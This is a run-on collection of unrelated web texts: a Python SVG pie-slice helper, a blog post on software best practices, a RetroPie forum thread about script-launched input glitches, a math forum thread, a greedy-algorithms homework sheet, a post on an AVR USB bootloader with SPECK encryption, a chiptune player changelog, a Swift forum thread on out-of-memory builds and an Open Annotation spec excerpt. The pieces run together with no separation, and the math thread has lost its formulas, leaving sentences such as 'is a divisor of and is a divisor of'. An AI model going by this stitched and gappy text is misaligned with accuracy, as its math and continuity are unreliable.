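    # Cap just below 1: a full 360-degree arc degenerates (start == end).
    angle = min(completeness, 0.99999) * 360
    start_x, start_y = polar_to_cartesian(cx, cy, radius, 0)
    end_x, end_y = polar_to_cartesian(cx, cy, radius, angle)
    large_arc = 1 if angle > 180 else 0  # flag flips past 180 degrees
    # M: move to the centre; L: vertical line up to the circle's edge;
    # A: sweep the arc clockwise; Z: close the slice back to the centre.
    return (f"M {cx} {cy} L {start_x:.2f} {start_y:.2f} "
            f"A {radius} {radius} 0 {large_arc} 1 {end_x:.2f} {end_y:.2f} Z")
```

The returned string would then go into the d attribute of a <path> inside the HTML handed to folium's DivIcon, along with an <svg> wrapper that has explicit width and height (to avoid the oversized clickable area mentioned below).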
These other parts of the project are well explained in the folium docs, and that is why I don't explain them here at length. You can check the final result here: Hydroelectric Map of Argentina — This map shows the location of the renewable power plants in Argentina. The data is provided by the Argentinian… Thanks for reading!
“You cannot do that! It violates X principle…” I have heard this statement countless times in my career. At first, when I was still young and clueless, I would feel dirty, like I had committed a mortal sin from which the software gods looked away in disgust. As I went on in my career, I began to question such statements. Did I violate a principle? Am I not using the best practice? Does this best practice apply to what I am doing? Some of the time the answer is yes, but in most cases I have found it not to be. In this very short post I am going to talk about the importance of context in software engineering.

The Buzzwords Plague

The software engineering world never runs out of buzzwords. Every day there is something cool: a better way to do something — a best practice. I have witnessed in awe as my fellow professionals (and myself sometimes) flock to the new shiny thing, shunning yesterday's best practices for today's. All of a sudden, that which was once a best practice has instantaneously morphed into an anti-pattern. Again, in some cases that is true. With the constant improvements in technology, some of the things that we held in high regard are no longer relevant. However, in most cases, we fall into the trap of going wherever the wind is blowing, blindly applying solutions where they don't apply.

Principles, Patterns And Best Practices

What are software development principles? Software development principles are a set of guidelines that help software engineers write quality, maintainable software. They come about naturally as we encounter similar problems or as we repeatedly make the same mistakes. They provide templates or guides to solve recurring problems. I will be using principles and patterns interchangeably in this post, though I think they are slightly different. Take the Don't Repeat Yourself (DRY) principle, for instance.
It is a result of people getting caught out when, all of a sudden, they are required to change the same logic that's scattered all over their codebase. It's definitely a good guideline. But is it the law? Certainly not! Best practices, on the other hand, are things that I find mostly misused or, dare I say, abused in the software engineering industry. What is a best practice anyway? To me, a best practice is something that solves a particular problem better than the other options (that the person has managed to come up with). I try to avoid the word "best" because chances are there is a better way of solving that problem. Are best practices bad? Not if they are applied correctly to the problems that suit them. This is where context comes in.

The Importance Of Context

Like they say, the best answer in software engineering is "it depends". There is an opportunity cost to every decision we make. Everything has a tradeoff. Choosing which best practice or pattern to use should always be done within the context of the problem space. Not all problems are the same. They may appear similar at face value, which usually leads to incorrectly applying a solution that doesn't efficiently or effectively solve the problem. The pattern (or best practice) that worked on your previous project won't necessarily apply to the next. Should you repeat yourself (violating the DRY principle)? Probably not, but if, in your context, you need to do so, please go ahead. I have witnessed two pieces of logic that appeared similar initially diverge as the project grew and requirements changed. Context matters.

I have countless partial projects on GitHub, most of them trying to solve the same problem using whatever the buzzword was at that moment — Clean Architecture, DDD, microservices, you name it. Most of the time I stopped midway because of pure laziness. However, in some cases I just hit a brick wall when I realised that I was over-engineering the solution while trying to follow the best practice.
Certainly that best practice/pattern didn't fit my problem space very well. Am I saying patterns, principles and good practices are a bad thing? No. They are very useful and most of the time help us avoid banging our heads against the wall while trying to solve certain problems. However, they should not be applied blindly, without taking the context into consideration. Context is king! I would like to hear your opinion on this topic. Please feel free to leave a comment below. Thanks so much for taking the time to read.
Tagged: Input RetroPie Emulationstation

10/09/2015 at 18:11 #107528

I installed RetroPie/ES as a standalone environment on top of a fresh Wheezy install. As a way to help myself use my Pi without a keyboard, I created a script to launch ES by pressing RB on my controller. To make sure my controller or xboxdrv weren't causing conflicts, I made a separate testing script that was literally just a hashbang with the command "emulationstation". When running that test script, all input, be it by controller or keyboard, is extremely glitchy when opening RetroPie Setup from within ES, or the launch options for ROMs. The glitchy input is also seen being accepted by the terminal in the background, some of which actually bleeds through over the menus. However, if I manually type "emulationstation" as a command in the terminal to launch it, none of this happens. Maybe emulationstation needs to be launched with a more complex argument or parameter when launching via a script like that, but I am not sure. If you would like, I can make a short video showing the behavior and post it here.

- Fresh Raspbian Wheezy install (latest version before the Jessie release) with RetroPie installed as a standalone environment.
- RPi 2 B
- OC'd using the RPi 2 preset in raspi-config
- Used the latest RetroPie-Setup script from GitHub.
- Currently, my /root partition is stored on an external HDD, but I had these issues even when working solely from the MicroSD.

EDIT: A video of what goes on: https://vid.me/Vo3p

10/09/2015 at 18:31 #107529

Please post your scripts, including details on how the script gets launched etc. Note that "emulationstation" is a script itself – the executable is in /opt/retropie/supplementary/emulationstation – so you should probably call it directly if launching from some custom code.

10/09/2015 at 18:37 #107531

For testing purposes, I am executing via bash by typing it. If I launch Emulationstation manually like this, the bug does not exist. The end-goal is to have it bound to RB on my controller.
But for now I need to figure out how to avoid this bug when launching via script. This is the script I wrote that is executed when pressing RB on the controller:

echo "$(tput setaf 2)Cleaning up…$(tput sgr 0)"
sudo killall emulationstation
sudo killall -9 retroarch
sudo killall -9 kodi.bin
sudo killall xboxdrv
xboxdrv --trigger-as-button --wid 0 --led 3 --detach-kernel-driver --ui-buttonmap RB=exec:/home/pi/emu.sh --ui-buttonmap LB=exec:/home/pi/kodi.sh --ui-buttonmap GUIDE=exec:/home/pi/killswitch.sh --quiet --silent &
sleep 1
fbset -depth 8 && fbset -depth 16
echo "$(tput setaf 2)Ready."
echo "Launching Emulationstation. Game on.$(tput sgr 0)"
emulationstation

10/09/2015 at 18:42 #107532

Just noticed your suggestion about calling it directly. I didn't realize the "emulationstation" call was itself a script. That /could/ be it, but the weird part is I have a similar script for Kodi and it is called the same way. In fact, the dev of Kodi explicitly states to call it using the "startkodi" script he provides and not to call it directly, so I couldn't say if your suggestion is right until I can test it.

10/09/2015 at 18:50 #107536

What code would you say I should use to call it directly?

10/09/2015 at 19:10 #107537

Oh, your script is not being launched from a tty – so that's why. Launch emulationstation with /dev/tty on the end? Or run your script with the above from whatever is triggering it.

10/09/2015 at 19:27 #107539

Could be related to backgrounding the xboxdrv also – run it with the --daemon parameter and remove the ampersand?

10/09/2015 at 19:40 #107542

So then change the line that says… I tried that just now, and although ES launched, the issue is still there.

10/09/2015 at 19:46 #107545

Well remember, even if I just run a test script that contains only the emulationstation command, this still happens. Effectively eliminating xboxdrv interference.

10/09/2015 at 19:48 #107546

You probably still have it running in the background – did you check?
Maybe you have multiple copies running now 🙂

10/09/2015 at 19:49 #107547
Also - did you try launching the ES binary directly?

10/09/2015 at 20:25 #107552
So if xboxdrv doesn't run at all, it functions fine, but that removes my ability to attach commands to the controller buttons, which is the whole purpose of my script: to be able to send a kill command to ES in order to launch Kodi, effectively eliminating the need for a keyboard. Sure, it squashes the input bug, but it makes my scripts pointless.

10/09/2015 at 20:26 #107553
Launching directly made no difference.

10/09/2015 at 20:39 #107554
Wait a minute. What if I just launch xboxdrv in /dev/tty?

10/09/2015 at 20:48 #107555
Have you tried launching xboxdrv manually with --daemon and then trying the simple script? Are you testing this on the machine itself or via ssh?

10/09/2015 at 20:51 #107556
On the machine. I know SSH can cause issues. I'll try that next when my son calms down.

10/09/2015 at 23:03 #107560
Daemon won't run. 'internal signalling write failed' libusbx

10/09/2015 at 23:12 #107561
Also, I have a hunch about something. Do you know how to tell it to emulate the press of the "enter" key via a bash script? I feel like that may have something to do with it, based on having to press enter to get a 'pi@raspberrypi' prompt to show up after executing a different, unrelated script.

10/10/2015 at 19:21 #107614
Forums are currently read only - please visit the new RetroPie forums at https://retropie.org.uk/forums/
Hmm... it seems that there are also other possibilities. The last element may be 3 if it is divisible by 3, 4 if it is divisible by 4, and so on. It seems to go on infinitely... How should I solve it, then?

Find all such sequences consisting of different positive integers that for the number is a divisor of and is a divisor of .

The consecutive elements of the sequence can't be more than 1 smaller than the previous one, as the previous one wouldn't be able to be their divisor then. I mean, this sequence works: because, as a matter of fact, we're still checking divisibility of the same numbers (62 and 61+1, which is 62, and so on) and, as 1 is the 62nd element, it can, of course, divide the first, which has to be an integer. As a matter of fact, this should work for every sequence like: or even with 2 at the end, supposing k is even. But what else? I'm stuck here.

Well, you've done a good job so far. Let's formalize what we know a little more: Suppose we let . Then we know . Our condition is that the last term is a factor of the first term plus 1. Another way of saying that is that is an integer. So we have to find all the integer solutions for the equation The question is how to do it. There are finitely many solutions. That should be clear because ultimately the numerator and the denominator will be too close (and thus not be factors) if you proceed too far in either the positive or negative direction. That means trial and error could work if you're patient enough. A better way of doing it is noticing that we can rewrite the equation as: Find all the pairs of factors, and you will find that this is the same as saying that must be a factor of 63. Thus we have all the sequences of the form you mentioned whose last term is a factor of 63.

Thank you. But is there any other way to solve the equation you mentioned than plain brute force? Also, can I state the fact that every element must differ by 1 just out of thin air, or do I have to prove it somehow?
I mean, the problem description doesn't make us work on any monotonic sequence, so isn't supposing it's descending by 1 at a time a little like starting from a special case?

Sorry for not replying earlier... the equation actually allows you to skip the use of brute force. Maybe I didn't make this clear enough. But , plus our assumptions about and , means that and must be integers. Therefore, we KNOW already that is a factor of 63, without having to do any work. In terms of proving that every sequence is of the form you mentioned, I think it's possible, but I haven't thought too deeply about it yet.

OK, thank you. I'm starting to wonder if the sequences of 62+k, 62+k-1, 62+k-2, ... are the only ones which can fulfill the requirements. I mean, look: also does, while being neither descending nor having any particular "step". So are the ones we found really the only ones?

well, we know that . so certainly there is no reason to expect . so the only thing left to do is to see if the 2nd condition somehow limits how we can choose the k's. it should be clear we can't let ALL the k's be greater than 1, or else (by quite a bit). but it could be that the sequence alternates... for example (1,2,1,2,1,...,2,1) would work, as would (1,2,5,4,3,2,1,2,1,2,...,2,1). without more information, it seems to me there are a LOT of possibilities (as long as we get to a number k ≤ 64 - n on the nth step, and k = n (mod 2), we can use this construction, and this doesn't exhaust all the possibilities). however, if the integers used are all distinct, these couldn't be used. i'll need to think for a while to see if that condition precludes all increasing-then-decreasing sequences.
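Candidate sequences like the ones discussed above can be checked mechanically. This sketch assumes the condition as reconstructed from the thread (some of it was lost in the problem statement): each term must divide its successor plus one, and cyclically the last term must divide the first term plus one. If the original condition differs, adjust the check accordingly.

```python
def satisfies_condition(seq):
    """Check that each a_i divides a_{i+1} + 1, treating the sequence
    as cyclic, so the last term must also divide the first term + 1.
    This encodes the condition as reconstructed from the discussion."""
    n = len(seq)
    return all((seq[(i + 1) % n] + 1) % seq[i] == 0 for i in range(n))
```

The descending sequence 62, 61, ..., 1 passes (each term divides the next plus one, and 1 divides 62 + 1), as does the alternating (1, 2, 1, 2, ..., 1) construction, while an arbitrary pair like (2, 4) fails since 2 does not divide 5.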
Algorithms Questionnaire Paper Homework Help

CS 330 – Spring 2021
Due: Wednesday, March 3 by midnight via Gradescope

Read pages 12-14 from Chapter 1 of our 330 textbook. Also read the following pages from Chapter 4, Greedy Algorithms, from the textbook: pages 115-125, and for next week pages 137-151. Do the three short questions (a), (b) and (c). Recall the Interval Scheduling Problem from section 4.1 of the text, which we discussed in class. The questions below all refer to this problem.

(a). (4 points) Give an example of an interval scheduling problem instance where at least 3 of the intervals can be scheduled (that is, they don't overlap) and which has EXACTLY 5 different optimal solutions. Note: As in the book, you should draw a picture to define the problem instance. To get credit you must state the size of the optimal solutions and also number the intervals and write down the 5 different optimal solutions to the problem. You can write down each optimal solution by writing down the numbers of the intervals that make up the solution.

(b). (4 points) Suppose we choose 2 rules for interval scheduling and combine them into one algorithm. Rule 1 selects the interval that is shortest, and Rule 2 selects the interval with the fewest conflicts. Both of these rules are considered separately in our textbook. The algorithm A is then: run Rule 1 on the Interval Scheduling Problem instance, then run Rule 2 on the same instance, and output the result which is largest. Show that algorithm A is not optimal by giving an example of an interval scheduling problem instance I which, when we run algorithm A on instance I, results in an answer which is not optimal. Specifically, your answer should look like one of those pictured in our textbook (or lecture), and you should explain briefly how this combined algorithm works on your example, what result you get when you run algorithm A on your example, and why it is not optimal.

(c).
(4 points) This question concerns the weighted interval scheduling problem, whose short description can be found on page 14 of the textbook; also see the first paragraph on page 122. Here each interval i has a start time ti and finish time fi, and also a positive value vi > 0 assigned to it. Here we assume that no two intervals have the same weight (just to avoid ties). The goal of the algorithm is to find a list of intervals which don't overlap and whose total weight is maximum. (The total weight is the sum of all the weights of the intervals chosen.) Show an example where the rule which chooses the largest-weight interval at each iteration does not always result in an optimal (that is, maximum) solution. So you start with all the intervals, apply the rule to get a largest-weight interval (say L), delete all intervals which overlap with L, and repeat until all of the intervals have either been chosen or deleted. For your answer you should just draw a picture (for example, as in Figure 4.1) which shows all the n intervals in your problem instance, where each interval is labeled by a number i from 1 to n, and n = the number of intervals in your example. Also give each interval i a value vi. Then say why the rule does not result in a maximum total value solution by giving the total value of your result using the rule and also the maximal total value of any compatible solution (which should be larger than the one you found).
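As a sanity check for part (c)-style reasoning, here is a hedged Python sketch (not part of the assignment; the instance is invented for illustration) showing the largest-weight-first rule falling short of a brute-force optimum on a three-interval instance:

```python
from itertools import combinations

def largest_weight_first(intervals):
    """Part (c)'s greedy rule: repeatedly take the largest-weight
    interval and discard everything that overlaps it.
    Intervals are (start, finish, value) triples."""
    chosen = []
    for iv in sorted(intervals, key=lambda iv: -iv[2]):
        # keep iv only if it is compatible with everything chosen so far
        if all(iv[1] <= c[0] or iv[0] >= c[1] for c in chosen):
            chosen.append(iv)
    return sum(iv[2] for iv in chosen)

def optimal(intervals):
    """Brute force: best total value over all compatible subsets."""
    best = 0
    for r in range(1, len(intervals) + 1):
        for combo in combinations(intervals, r):
            if all(a[1] <= b[0] or b[1] <= a[0]
                   for a, b in combinations(combo, 2)):
                best = max(best, sum(iv[2] for iv in combo))
    return best

# A hypothetical instance: one heavy interval (value 3) spanning two
# lighter ones (value 2 each). The greedy rule grabs the heavy one.
instance = [(0, 4, 3), (0, 2, 2), (2, 4, 2)]
```

On this instance the greedy rule returns 3 (it takes the value-3 interval and deletes the rest), while the two value-2 intervals are compatible and total 4, so the rule is not optimal.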
Update #2 (Jan 21 2018): Version 2.0 - Support for Windows added! Support to query the BL version from the loaded app added. For Windows, since it does not allow variable-sized HID packets, the packets are padded and thus the speed is slightly slower.

Update #1 (Jan 6 2018): Improvements to allow USB string manipulation and re-enumeration by the bootloaded app. Also uses EP0 for PC-to-device transfers, as this is faster. However, this means that transfers whose size is an exact multiple of 8 bytes can never be determined to have ended, so the packet format is updated to allow indication of "packet was padded to not be a multiple of 8" and the tool is updated to perform this action as needed.

There exist already many AVR bootloaders. "Why another?" you might ask. Well, even though there do exist a lot, none fit my requirements. What sort of requirements could I have, you might wonder. Well, it had to be USB-based. A few exist that do this. It had to be USB-HID so that no driver would be necessary in Windows. Hm... Well, still a few exist that do this. Oh, and I needed it to dynamically load an application and allow it to run under it, while still providing USB comms features and encrypted uploads/updates. You see, most of the existing USB bootloaders for AVR only do USB for bootloading. The actual loaded application has no access to the USB stack the bootloader uses. It has to either not use USB or include its own copy of a USB stack. Neither of those options is a good one, really. USB features? Run under it? All valid exclamations. Yes, this bootloader will act like a mini-OS. It will dynamically load an application over USB into flash, and provide an API to it. The API is mainly for communications (USB for now, but other protocols are doable; the apps do not depend on it being USB).
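The comms API described can be modeled roughly as below. This is a Python sketch of the semantics only; the real API is a set of C functions exposed by the bootloader, and the names here, like the assumed TX buffer depth, are illustrative rather than the actual symbols.

```python
from collections import deque

class ModulaRComms:
    """Toy model of the bootloader's comms API: check for a received
    packet, fetch it, check for TX space, and send a packet."""
    MAX_PACKET = 142          # maximum packet size supported
    TX_CAPACITY = 4           # assumed buffer depth, not from the post

    def __init__(self):
        self._rx = deque()
        self._tx = deque()

    def simulate_usb_rx(self, data):   # test hook standing in for USB
        self._rx.append(bytes(data))

    def rx_packet_available(self):     # "is a complete packet RXed yet?"
        return bool(self._rx)

    def rx_get_packet(self):           # "get the packet data if so"
        return self._rx.popleft()

    def tx_has_space(self):            # "is there space in the TX buffer?"
        return len(self._tx) < self.TX_CAPACITY

    def tx_send_packet(self, data):    # "send one"
        if len(data) > self.MAX_PACKET:
            raise ValueError("packet too large")
        self._tx.append(bytes(data))
```

The preferred wire format from the post, an 8-bit packet type followed by an 8-bit CRC and the data, would sit inside the byte strings passed through this interface.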
The dynamic loading and lack of static linking with V-USB (the USB implementation of choice) might also be important to you, of course, for license reasons (as your code is loaded dynamically, it is not a derived work). The API provided to the application is pretty simple, actually. There is a function to see if there is a complete packet that has been RXed yet, and another to get the packet data if so. There is a function to see if there is space in the TX buffer for a packet, and another to send one. There is also one to run various background tasks, and another to jump into the bootloader (to do an update, for example). The maximum packet size supported is 142 bytes (but you can adjust this to any size you wish in the source code). The preferred format is an 8-bit packet type, an 8-bit CRC, followed by data. And then there's encryption... How would you update your application in the field safely without exposing it? With an encrypted update, of course. I implemented the SPECK block cypher decryption code in CBC mode in AVR assembly (and the rest in C: encryption, key schedule). I chose the SPECK configuration with a 64-bit block and 128-bit keys. It seemed like a reasonable compromise between code size and security for my purposes. But if you want a different config, the SPECK code provided will happily support block sizes of 32, 64, and 128 bits and key sizes of 64, 96, 128, 192, and 256 bits. I only provided an AVR assembly implementation of SPECK-64/128-CBC-decryption, but it is easy to change to all the other variants. Go wild! Encryption in ModulaR is optional. At build time you can include (or not) the key. If no key is included, ModulaR will accept plaintext uploads. If a key is included, only encrypted uploads will be accepted. For speed and code size, the key included is actually the expanded SPECK keyschedule. This allows us to use SPECK with a 0-byte RAM footprint. Cool, huh?
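To make the cipher choice concrete, here is a minimal single-block SPECK-64/128 sketch in Python. The bootloader's real implementation is AVR assembly running in CBC mode; the lack of CBC chaining here, the word ordering, and the example key are all simplifications for illustration.

```python
MASK = 0xFFFFFFFF            # 32-bit words for the 64-bit-block variant
ALPHA, BETA, ROUNDS = 8, 3, 27  # SPECK-64/128 rotation amounts and rounds

def _ror(v, r): return ((v >> r) | (v << (32 - r))) & MASK
def _rol(v, r): return ((v << r) | (v >> (32 - r))) & MASK

def expand_key(k):
    """Expand a 4-word (128-bit) key into the 27 round keys."""
    l, ks = list(k[1:]), [k[0]]
    for i in range(ROUNDS - 1):
        l.append(((ks[i] + _ror(l[i], ALPHA)) & MASK) ^ i)
        ks.append(_rol(ks[i], BETA) ^ l[-1])
    return ks

def encrypt(block, ks):
    x, y = block
    for k in ks:
        x = ((_ror(x, ALPHA) + y) & MASK) ^ k
        y = _rol(y, BETA) ^ x
    return x, y

def decrypt(block, ks):
    x, y = block
    for k in reversed(ks):        # undo each round in reverse order
        y = _ror(x ^ y, BETA)
        x = _rol(((x ^ k) - y) & MASK, ALPHA)
    return x, y
```

Decryption simply inverts the two round operations in reverse order, which is why the AVR side only needs the decryption direction plus the precomputed keyschedule.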
To prevent someone from messing with the cyphertext, a checksum of the decrypted plaintext is computed as it streams in, and the uploaded image is marked as valid only if the checksum matches the expected value (sent encrypted as the last upload block). Marked as valid? Yes. The uploaded code is written to flash, but until it is marked as valid, it will not be run. This prevents partial uploads from trying to run and crashing. For unencrypted uploads, the mark is placed when the "UPLOAD DONE" packet is sent. What about the PC side of this? I used HIDAPI to interact with the device. It supports userspace HID in Windows and has support for Linux and macOS too. It really is quite wonderful and simple to use. I wrote a tool that can upload an update to ModulaR, and another that will do encryption for you and produce the keyschedule needed for inclusion in ModulaR's source. There is also a hacky decryptor app just for you to double-check the results of encryption. How big is it? Well, I only optimized for size the most egregious of avr-gcc's mistakes, so the whole thing is still quite large - 3300 bytes if you include the 108-byte keyschedule for SPECK-64/128. But this is not actually that bad, since your actual application code does not need to include another copy of the USB stack - ModulaR provides you with the data in/out APIs already. In reality, with some more ASM work it can be shrunk quite a bit, but this is already good enough for my purposes, so I am leaving it as it is (for now). How do I use it? Build ModulaR (or use the included HEX file if the key 00112233445566778899aabbccddeeff is OK with you :) ) and flash it to an AVR. Wiring is standard V-USB wiring. You can use the provided sample linker script for your app. All interrupt vectors will be passed to you except INT0. That one is reserved for ModulaR and will never be passed to your app. Once in a while you'll want to call the usbWork() function.
On every boot, ModulaR will wait about 2 seconds for an upload and then boot your application. If no application is found, it will wait forever. If you want to get into the bootloader mode from your application, an API is provided. The included SampleApp demonstrates all the uses. It responds to a few packet types (packet 0 echoes back whatever you sent XORed with 0xFF; packet 1 sends back the sum of all the bytes you sent). To facilitate uploads, if the app detects one of the commands reserved for the bootloader (0xFC-0xFF), it reboots to the bootloader for easier updates. To encrypt it, run tools/encryptor 00112233445566778899aabbccddeeff < SampleApp.bin > SampleApp.encr.bin. To then upload the resulting file, use tools/uploader SampleApp.encr.bin. License? As required by the V-USB inclusion, the AVR code is GPLv2-licensed. This includes my implementation of SPECK. The PC-side code is BSD-3-clause-licensed (this also includes that same implementation of SPECK). Enjoy. You can download ModulaR here: => [LINK] <=
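The SampleApp's two packet handlers are simple enough to model directly. A sketch of their behavior (the width of the type-1 sum isn't stated in the post, so an 8-bit truncation is assumed here):

```python
def sample_app_handle(ptype, payload):
    """Model of the SampleApp's responses: packet type 0 echoes the
    payload XORed with 0xFF; packet type 1 returns the sum of all
    payload bytes (truncated to 8 bits here as an assumption).
    Types 0xFC-0xFF are reserved for the bootloader: the app reboots."""
    if ptype == 0:
        return bytes(b ^ 0xFF for b in payload)
    if ptype == 1:
        return bytes([sum(payload) & 0xFF])
    if 0xFC <= ptype <= 0xFF:
        return None  # would reboot into the bootloader here
    raise ValueError("unhandled packet type")
```

For example, sending type 0 with bytes 0x00 0x0F comes back as 0xFF 0xF0, and type 1 with 0x01 0x02 0x03 comes back as 0x06.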
Description | Download | Changes | Home

aylet plays music files in the `.ay' format. These files are essentially wrappers around bits of Z80 code which play music on the Sinclair ZX Spectrum 128's sound hardware - either the beeper, or (eponymously) the AY-3-8912 sound chip. (Files using the Amstrad CPC ports are also supported.) The sound hardware emulation is based on the one I wrote for the Spectrum emulator Fuse, and the Z80 emulation is from Ian Collier's `xz80'. There are front-ends for curses and X, both with much the same features. That said, the curses version does have a `non-UI' option, letting you use it in much the same way as mpg123. You can also output music as a sample on stdout. Note that playlist management is rather poor at the moment (it just plays files specified on the command-line). I do plan to fix this eventually. The current version is 0.5, available from ibiblio.

This excerpt from NEWS lists the changes from aylet 0.1 onwards.

- Fixed a stupid bug where the fadeout time defaulted to zero, so by default all tracks lasting longer than 3 minutes were cut off abruptly.
- Added 16-bit support. Now defaults to this when possible. New option `-e' forces 8-bit playback (even that is improved, due to the 16-bit mixing now done). Thanks to Stuart Brady for inspiring this change.
- Added `-t' option, to play only a given track (actually slightly different, see the man page). Thanks to Bartlomiej Ochman for this.
- Fixed unhelpful interactive stop-after-setting behaviour when started with stop-after set to something not a multiple of 30 seconds; now the first interactive change will set it to the nearest multiple in the specified direction. Thanks to Bartlomiej Ochman for this too.
- Fixed a compilation error with newer versions of gcc (the code was wrong before, but wasn't complained about). Thanks to Daniel Baumann for pointing this one out.
- Finally uses accurate AY levels. Thanks to Matthew Westcott for the measurements these were based on.
- Removed beeper fading, which wasn't actually necessary and was causing problems with some tracks, most noticeably in Trantor. The rest position is still central for AY-only and CPC tracks, though, so the change shouldn't affect those.
- Added partial port-bitmask to allow for certain less-than-ideal .ay conversions. Thanks to Vít Hotárek for helping find this one.
- Fixed silly typo which meant that L and L' weren't set correctly when starting up the Z80. (Though curiously, this bug didn't seem to break any .ay files.) Thanks to Patrik Rak for spotting this.
- Previously, when a track stopped and happened to do so leaving high/low level `silence' (e.g. a few AY tracks and, given the beeper-fade removal, all beeper tracks), if this change happened during a fade, the fading level would screw up the silence detection and give (with default settings) up to ten seconds of extra `silence'. Now fixed.
- In xaylet, long file details (e.g. track name) no longer expand the window to fit, but are clipped. You can still manually resize the window to see the rest of the text, if you like.
- OUT instructions previously took too long, making some beeper tunes (e.g. Heavy on the Magick) sound terribly slow - fixed.
- New AY volume levels, which should more closely reflect actual AY output.
- Added support for CPC files.
- A native sound driver for OpenBSD. Thanks to Chris Cox for this.
- Fixed most clicking problems. There are still a few, but it's doing much better than before.
- Rewrote envelope emulation; the old one couldn't be made to cope with high-speed envelopes (as used in some demos). Also fixes presumably-accidental zero-period envelope use with `negative' volume (e.g. Afterburner).
- Fixed high-frequency noise.
- Beeper tones inverted, so they're now the right way up. :-)
- Changed field label from "Title" to "Misc" throughout. Some files use it for Title, some Copyright, some both. So "Misc" is about the only reasonable label.
I'm trying to build my SPM package. It builds just fine on my Mac, but on an Ubuntu 22.04 machine, most of it builds, but this step fails with "Killed." When run as part of swift build, it suggests adding -v to see the invocation (linked above). I wasn't able to add -v to that invocation to get more information.

$ /usr/bin/time -f "%E %M" ./test.sh
Command exited with non-zero status 137

where test.sh is just that large swift-frontend invocation. If I'm interpreting that correctly, that's 684 MB peak memory used. Is it possible something is killing the process due to using too much RAM?

If enabling swap fixed it, then it sounds like the OOM killer was responsible for killing the compiler. I don't think there's much an individual process can do to improve the ability to diagnose a kernel routine that vaporizes processes when VM usage gets too high.

The related sysctl files are /proc/sys/kernel/core_pattern, etc. You can modify them directly or using sysctl. See this article for example.

/proc/sys/kernel/core_pattern supports redirecting core dumps to an application. Ubuntu uses that feature to let apport handle core dumps. According to the apport man page, it saves core files under /var/crash. Do you see files in that directory? In your case, the core file might be of the bash process, I think. BTW, getting core files is usually the first step in most cases. But you are lucky in this case, because the fact that bash core dumped indicates something on its own.

If it's an OOM issue, I think you should be able to find related messages in /var/log/kern.log (or just run dmesg).

You said you saw an apport report. Does that mean you use a GUI in the droplet? If so, I'd suggest installing a minimal Ubuntu server installation. Another option is to install VMware Fusion on your MacBook. It works quite well (I do it all the time; I just use macOS for app development). Maybe start a background process to collect system metrics (especially memory usage)?
That may help to investigate the root cause of mysterious build failures.

I only see files in /var/crash for the sleep task I killed on purpose to test my crash reporting. I don't get it when swift is killed. I do not use a GUI droplet, only a minimal server. It's definitely a memory exhaustion issue. I fixed it by enabling swap, but that wasn't enough to let the docker build finish. I just ended up moving the docker build to GitHub Actions. So far, so good.

does your package have very long source files? iirc, @lorentey recently uncovered a dramatic increase in compiler memory usage as individual source files get longer. breaking up the files into smaller files resolves the issue, apparently.

My files are not especially long. I haven't checked Vapor and its dependencies. I don't think the file that was usually crashing was particularly long, but it wasn't always the same one and now I'm not sure which one it was.

they are an order of magnitude shorter than the file (40k lines) that was causing swapping when building swift-atomics on swift CI. but the swift CI also probably has much more than 1 GB of memory available.

I've been frequently running into OOM issues when compiling packages on VMs or in docker containers with low RAM and without swap (and "Killed" is exactly the resulting error). I don't recall the exact numbers, but 1 GB is tight for packages with a fair number of dependencies, in my experience.
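Following the suggestion above to collect system metrics in the background, here is a stdlib-only Linux sketch that samples MemAvailable from /proc/meminfo. Run it alongside `swift build` and watch the minimum reading; the field name assumes a reasonably modern kernel, and the function returns None on systems without /proc.

```python
import time

def mem_available_kib(path="/proc/meminfo"):
    """Return MemAvailable in KiB, or None if it can't be read."""
    try:
        with open(path) as f:
            for line in f:
                if line.startswith("MemAvailable:"):
                    return int(line.split()[1])  # value is in kB
    except OSError:
        return None
    return None

def sample(interval_s=1.0, count=60):
    """Take `count` samples; the minimum is the interesting number
    when hunting for an OOM kill during a build."""
    readings = []
    for _ in range(count):
        readings.append(mem_available_kib())
        time.sleep(interval_s)
    return readings
```

If the compiler is OOM-killed, the last readings before the kill (together with the `dmesg` output mentioned above) usually make the diagnosis obvious.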
The OA Community Group's February 2013 Open Annotation Data Model (this document) has been superseded by the following W3C Web Annotation Working Group Candidate Recommendations (July 2016):

The Open Annotation data model specifies a very simple method of expressing the provenance of an Annotation. This can be mapped into the richer and more complex W3C PROV model. The PROV model is expressed in terms of Activities and Entities consumed or produced by those Activities. There are two Entities in the Open Annotation model, which for expediency and simplicity are collapsed into just one. These are the Annotation document, and the concept that the Annotation embodies or describes. This is the distinction between oa:annotatedAt and oa:serializedAt. In the PROV model we have to split these apart again. We use the oa:Annotation for the concept, and thus still require an Annotation document. There are also two Activities, Annotating and Serializing, which produce these Entities. In this case, Annotating is the process of annotating a resource, and should not be confused or conflated with the Motivation of the same name. Serializing is the process by which the Annotation Document is created. The Annotation document is derived from the concept, which necessarily comes first. The concept was produced as the outcome of the Annotating process, which was performed by an Agent, the object of oa:annotatedBy. The Annotation document was produced as the outcome of the Serializing process, which was also performed by an Agent, the object of oa:serializedBy. Both of these processes happened at a particular point in time:

<anno1> a oa:Annotation ;
    a prov:Entity ;
    prov:wasGeneratedBy <serializing1> ;
    prov:wasDerivedFrom <annoConcept1> ;
    prov:generatedAt "datetime1" ;
    oa:serializedAt "datetime2" ;
    oa:serializedBy <agent2> ;
    oa:annotatedBy <agent1> ;
    oa:annotatedAt "datetime1" .

<annotating1> a prov:Activity ;
    prov:wasAssociatedWith <agent1> .
<annoDocument1> a prov:Entity ;
    prov:generatedAt "datetime2" ;
    prov:wasGeneratedBy <serializing1> .

<serializing1> a prov:Activity ;
    prov:wasAssociatedWith <agent2> .

Although the list of Motivations in the specification is derived from an extensive survey of the annotation landscape, there are many situations where more exact definitions of Motivation are required or desirable. In these cases it is RECOMMENDED to create a new Motivation resource and relate it to one or more that already exist. New Motivations MUST be instances of oa:Motivation, which is a subClass of skos:Concept. A skos:broader relationship SHOULD be asserted between the new Motivation and at least one existing Motivation, if there are any that are broader in scope. Other relationships, such as skos:closeMatch, SHOULD also be asserted to concepts created by other communities.

oa:motivationScheme a skos:ConceptScheme .

oa:editing a oa:Motivation ;
    skos:inScheme oa:motivationScheme ;
    skos:prefLabel "Editing"@en .

new:correcting a oa:Motivation ;
    skos:inScheme new:aScheme ;
    skos:broader oa:editing ;
    skos:prefLabel "Correcting a Mistake"@en .

new2:fixing a oa:Motivation ;
    skos:inScheme new2:anotherScheme ;
    skos:broader oa:editing ;
    skos:closeMatch new:correcting ;
    skos:prefLabel "Fixing a Mistake"@en .

